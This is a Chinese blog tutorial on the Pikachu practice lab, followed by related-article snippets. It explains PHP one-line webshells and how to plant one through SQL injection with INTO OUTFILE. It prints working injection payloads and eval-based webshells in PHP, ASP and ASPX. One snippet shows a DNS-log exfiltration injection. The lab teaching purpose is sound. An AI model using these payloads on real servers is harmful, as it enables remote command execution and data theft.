sql-inject 通过一句话木马对服务器进行远程控制

最新推荐文章于 2024-02-04 10:37:46 发布
最新推荐文章于 2024-02-04 10:37:46 发布
阅读量712 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43915842/article/details/88998601
版权
本文探讨了一句话木马的概念,它是如何利用编程语言执行操作系统命令的。接着,通过SQL注入漏洞,解释了如何将恶意代码写入服务器,并利用into outfile方法在满足特定条件时执行。通过实例展示了在成功注入后,如何远程控制服务器执行命令。
摘要由CSDN通过智能技术生成

1.一句话木马
说简单点,它就是利用各种语言提供的用来执行操作系统命令的函数去构造一个简单的木马程序,我们可以把这个函数直接写到一个文件里去,通过对这个文件的访问,去执行这个函数,向这个函数去传入我们想要进行的操作,这个函数会被执行,然后执行我们想要的操作
在这里插入图片描述
2.通过SQL Inject漏洞写入恶意代码
我们可以利用into oufile来传入我们的木马,但并不是很容易就可以传进去的,它是有前提条件的
在这里插入图片描述
在满足前提条件的情况下,我们可以开始测试,我们仍然来到pikachu的字符型注入
payload:kobe' union select "<?php @eval($_GET['test'])?.",2 into outfile "/var/www/html/1.php"#
如果我们没有在数据库中关闭这个选项,就会出现这个情况
在这里插入图片描述
如果我们满足了所有条件的话,页面会这样显示

最低0.47元/天 解锁文章
。北冥有鱼
关注
MySQL数据库SQL注入靶场sqli通关实战(附靶场安装包)
悦分享
10-20 353
SQL注入是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。带入执行的参数能够可控;拼接的SQL语句能够带入数据库中,并执行;SQL注入攻击是通过操作输入来修改SQL语句,用以达到执行代码对WEB服务器进行攻击的方法。
墨者学院 - 远程电子数据取证-木马分析
多崎巡礼的博客
08-28 2149
第一题 驱动级文件隐藏 此驱动级隐藏文件会在服务项增加一个xlkfs的服务 驱动文件路径为:c:\WINDOWS\system32\drivers\xlkfs.sys 配置文件路径为:c:\WINDOWS\xlkfs.ini 转自:http://www.91ri.org/15356.html 独自等待   解题思路: 连接上服务器,先搜索SEO找到seo文件夹路径,在C:\Inet...
一句话木马写入以及通过sql进行服务器的远程控制
weixin_44720762的博客
04-21 1936
在开始之前我想先在这里提醒选择阅读这篇博客的读者。因为本人初涉安全领域知识。关于sql盲注尚处于学习和摸索状态,存在对些许知识点和概念理解尚不清晰甚至是完全偏差的问题。此博客亦是只起到对现所学知识的一个记录。所以只起到一个借鉴的作用,并不建议读者用作专业知识学习。 在演示通过sql进行服务器的远程控制之前,必须首先清除两个基本的概念,也就是一句话木马以及如何通过into_outfile写入代码并控...
SQL Inject
辉小鱼的博客
09-09 558
SQL Inject 发生于应用程序与数据库层的安全漏洞,网站内部直接发送的SQL请求一般不会有危险,但实际情况是很多时候需要结合用户的输入数据动态构造SQL语句, 如果用户输入的数据被构造成恶意SQL代码,web应用又未对动态构造的SQL语句使用的参数进行审查,则会带来影响不到的危险。
Sql Inject-SQL注入
田田云逸的博客
04-28 486
在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。一个严重的SQL注入漏洞,可能会直接导致一家公司破产!SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。哦,SQL注入漏洞,可怕的漏洞。
Pikachu靶场通关笔记--Sql Inject(SQL注入)
weixin_45908624的博客
12-09 3201
sql注入
WebWall-05.SQL-Inject(SQL注入漏洞)
凯歌响起的博客
08-27 399
数据库注入漏洞,主要是开发人员在构建代码时,没有对输入边界进行安全考虑,导致攻击者可以通过合法的输入 点提交一些精心构造的语句,从而欺骗后台数据库对其进行执行,导致数据库信息泄露的一种漏洞。......
Pikachu靶场-SQL Inject
qq_53083285的博客
11-10 5280
Pikachu靶场–Sql
Web安全Day1 - SQL注入实战攻防
hongrisec的博客
02-20 3207
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.Web安全Day1 - SQL注入实战攻防 https://mp.weixin.qq.com/s/zP0MZNhnZG_S9aoHDXzvWA 1. SQL注入 1.1 漏洞简介 结构化查询语言(Structured Query Language...
基于pikachu漏洞平台的 --SQL注入攻击学习与总结
Mr.hu
10-16 1692
SQL注入攻击 基础知识 常见注释符号(官方链接): mysql> SELECT 1+1; # 行内注释 mysql> SELECT 1+1; -- 行内注释 mysql> SELECT 1 /*行内注释 */ + 1; mysql> SELECT 1+ /* 多行注释 */ 1; mysql> SELECT * FROM table1 WHERE a=1 /*! AND b=2 */ 其中/*! */ 里面的语句会被MySQL识别并执行,但是会被其他系统
SQL注入(Injection)简介
cnds123的专栏
11-25 6509
SQL注入(Injection)简介 SQL注入(SQL injection),是发生于应用程序与数据库层的安全漏洞。只要是支持处理SQL指令的数据库服务器,都有可能受到此种手法的攻击。 是网站存在最多也是最简单的漏洞。主要原因是程序对用户输入数据的合法性没有判断和处理,导致攻击者可以在 Web 应用程序中事先定义好的 SQL 语句中添加额外的 SQL 语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步获取到数据信息。 SQL注入演示 SQL命令
SQL INJECTION注入之经典教程
06-28
关于SQL注入的两篇经典文章,国外的专业机构写的.对于有一定SQL编程经验又想了解SQL inject的人来说是不错的教程.
一句话木马的适用环境和工作原理/原理应用解析
kendyhj9999的专栏
01-26 1752
一句话木马的适用环境和工作原理/原理应用解析 2011-12-20 10:17:27     我来说两句       收藏    我要投稿  http://www.2cto.com/Article/201112/114599.html 一句话木马的适用环境: 1.服务器的来宾账户有写入权限 2.已知数据库地址且数据库格式为asa或asp 3.在数据
通过SQL inject漏洞写入恶意代码
weixin_43858799的博客
04-15 259
一、sqli漏洞演示: 1.通过SQL inject漏洞写入恶意代码 默认情况下:secure_file_priv是关闭的 首先通过show global variables like ‘%secure%’; 然后切会pikachu做测试 获得操作系统权限: allen’ union select " <?php @eval($_GET['test'])?>",2 into ou...
Web安全-一句话木马
最新发布
mmxhappy的专栏
02-04 1666
在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢?先来看看最简单的一句话木马:?【基本原理】利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括号内的语句字符串什么的全都当做代码执行。
SQL注入篇——一句话木马
爱国小白帽
01-08 6593
一、利用sql注入上传一句话木马 成功 验证 二、利用dns报错回显查看数据 三、利用dns报错回显数据 返回数据库名的注入语句 1’ and load_file(concat("\\",(database()),".2bmmih.dnslog.cn\1.txt")) – - ...
文件上传一句话木马getshell
qq_41620273的博客
12-25 5753
文件上传 文件上传流程: a.文件表单提交 b.生成临时文件(读取临时文件信息) c.后端语言判断该文件是否合规 d.合规则保存文件 一句话木马: 1.在phpstudy搭建的站点www目录下写入一个php文件,访问该网站下的php文件成功: 命令执行函数:system()、Exec()、 Shell_exec() passthru(): 只调用命令,把命令的运行结果原样地直接输出到标准输出设备上 1.如url中输入:XXXX/1.php?a=net user mqu sss /add
sql注入与一句话木马
告白的博客
07-09 3369
0x00 sql注入之一句话木马 首先介绍一下一句话木马一句话木马是一种基于 B/S结构的简短脚本,通过这个脚本,执行POST来的任意参数语句,可以提交任意内容,黑客借此进行SQL注入或拿到SHELL写入大马或截取网站私密信息,达到注入非法信息等的目的。 常见脚本的一句话木马: php的一句话木马: <?php @eval($_POST['pass']);?> asp的一句话是: <%eval request (“pass”)%> aspx的一句话是: <%@ Page
【网络安全---sql注入(2)】如何通过SQL注入getshell?如何通过SQL注入读取文件或者数据库数据?一篇文章告诉你过程和原理。
m0_67844671的博客
10-01 2296
sql注入】如何通过SQL注入getshell?如何通过SQL注入读取文件或者数据库数据?一篇文章告诉你过程和原理。本篇博客主要是通过piakchu靶场来讲解如何通过SQL注入漏洞来写入文件,读取文件。通过SQL输入来注入木马来getshell等,讲解了比较详细的过程;
pikachu靶场通关sql-inject
09-24
为了通关pikachu靶场的sql-inject,您可以按照以下步骤进行操作: 1. 使用sqlmap工具进行数据库名的查询。您可以使用以下命令来查询数据库名为pikachu的所有表名:sqlmap -u ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值